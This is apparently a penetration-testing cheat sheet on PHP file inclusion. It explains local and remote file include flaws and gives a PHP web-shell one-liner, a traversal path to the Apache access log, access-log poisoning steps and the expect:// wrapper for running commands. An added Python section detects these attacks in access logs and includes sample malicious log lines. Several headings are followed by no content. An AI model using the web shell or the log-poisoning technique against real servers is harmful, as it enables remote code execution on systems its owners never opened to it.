File Inclusion
In a lot of applications, developers need to include files to load classes or to share some templates between multiple web pages.
File include vulnerabilities come from a lack of filtering when a user-controlled parameter is used as part of a file name in a call to an including function (require, require_once, include or include_once in PHP, for example). If the call to one of these functions is vulnerable, an attacker can manipulate it to load their own code. File include vulnerabilities can also be used like a directory traversal to read arbitrary files; if the included file contains an opening PHP tag, its contents are interpreted as PHP code.
The including function may be able to load local resources or remote resources (a website, for example). If it is vulnerable, this leads to:
Local File Include: LFI. A local file is read and interpreted.
Remote File Include: RFI. A remote file is retrieved and interpreted.
By default, PHP disables loading of remote files through the configuration option allow_url_include.
One-liner payload: <?php system($_GET['param']); ?>
LFI
Payloads
Reference: HTB-Poison: https://medium.com/swlh/hack-the-box-poison-writeup-w-o-metasploit-a6acfdf52ac5
Access-Log Poisoning
Access Log Locations
RHEL / Red Hat / CentOS / Fedora Linux Apache access file location – /var/log/httpd/access_log
Debian / Ubuntu Linux Apache access log file location – /var/log/apache2/access.log
FreeBSD Apache access log file location – /var/log/httpd-access.log
Exploitation
Requests to the web server are stored in the access log. This includes the User-Agent header, which is controlled by the client.
If the access log is included by the vulnerable script, the code present within these entries is evaluated, so a payload can be injected into any request header that is reflected in the access log.
Use syntactically correct PHP: a parse error written into the access log makes every include of that file fail and renders it useless.
Vulnerable index.php File
On this web application the vulnerability exists in the index.php file. Using ../../../../var/log/apache2/access.log as the payload, we were able to see the following:
As shown, we were able to load the PHPInfo file, meaning that our code was executed.
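From the defender's side, the two steps described above (a PHP tag written into a logged header, then an include of the log path) both leave traces in the same access log. The following is an added example, not from the original page, of a small detector over Apache combined-format lines; the sample log lines are constructed, and the rule names are my own.

```python
import re
from urllib.parse import unquote
# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                     r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')
# Access log paths listed on the page: an include parameter naming one of them is the
# read-back step of access-log poisoning.
LOG_FILE_PATHS = ("/var/log/httpd/access_log", "/var/log/apache2/access.log", "/var/log/httpd-access.log")
# Wrappers listed under RFI on the page (plus https): a query value starting with one is a remote include attempt.
REMOTE_SCHEME_RE = re.compile(r"=(?:https?|ftp|expect)://", re.IGNORECASE)
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.IGNORECASE)  # opening PHP tag inside a logged header

def classify(entry: dict) -> list:
    """Return the sorted rule names that fire for one parsed log line."""
    rules = set()
    target = unquote(unquote(entry["target"]))  # decode twice so %252e%252e%252f is caught too
    if "../" in target or "..\\" in target:
        rules.add("traversal")
    if any(p in target for p in LOG_FILE_PATHS):
        rules.add("log_file_target")
    if REMOTE_SCHEME_RE.search(target):
        rules.add("remote_include")
    # User-Agent and Referer are written verbatim into the access log, so a PHP tag in either
    # is the poisoning step that precedes including the log file.
    if PHP_TAG_RE.search(entry["agent"]) or PHP_TAG_RE.search(entry["referer"]):
        rules.add("php_tag_in_header")
    return sorted(rules)

def scan_log(text: str) -> list:
    """Parse combined-format lines and return only those that trigger at least one rule."""
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # not a combined-format line: skip it rather than crash
        entry = m.groupdict()
        rules = classify(entry)
        if rules:
            findings.append({"ip": entry["ip"], "target": entry["target"], "rules": rules})
    return findings

# Constructed sample lines (not from the page): a benign request, a traversal to the Debian log
# path, the page's one-liner in User-Agent, a remote URL, and a URL-encoded traversal.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2024:12:00:02 +0000] "GET /index.php?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 9981 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2024:12:00:03 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "<?php system($_GET['param']); ?>"
10.0.0.9 - - [10/Mar/2024:12:00:04 +0000] "GET /index.php?page=http://203.0.113.10/include.txt HTTP/1.1" 500 0 "-" "curl/8.0"
10.0.0.9 - - [10/Mar/2024:12:00:05 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""
```

Running scan_log(SAMPLE_LOG) flags four of the five lines; the benign first request produces no finding.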
File Upload Race Condition
Edit the payload -> webshell
Edit the LFIREQ parameter to the currently vulnerable parameter
Edit tmp_name '>' into > [Use a proxy to troubleshoot]
Usage: python lfi.py [IP] [Port] [Threads : 100]
RFI
ftp://
http://
expect://
The PHP expect wrapper allows you to run system commands. The syntax of the exploit is:
RFI To Code Exec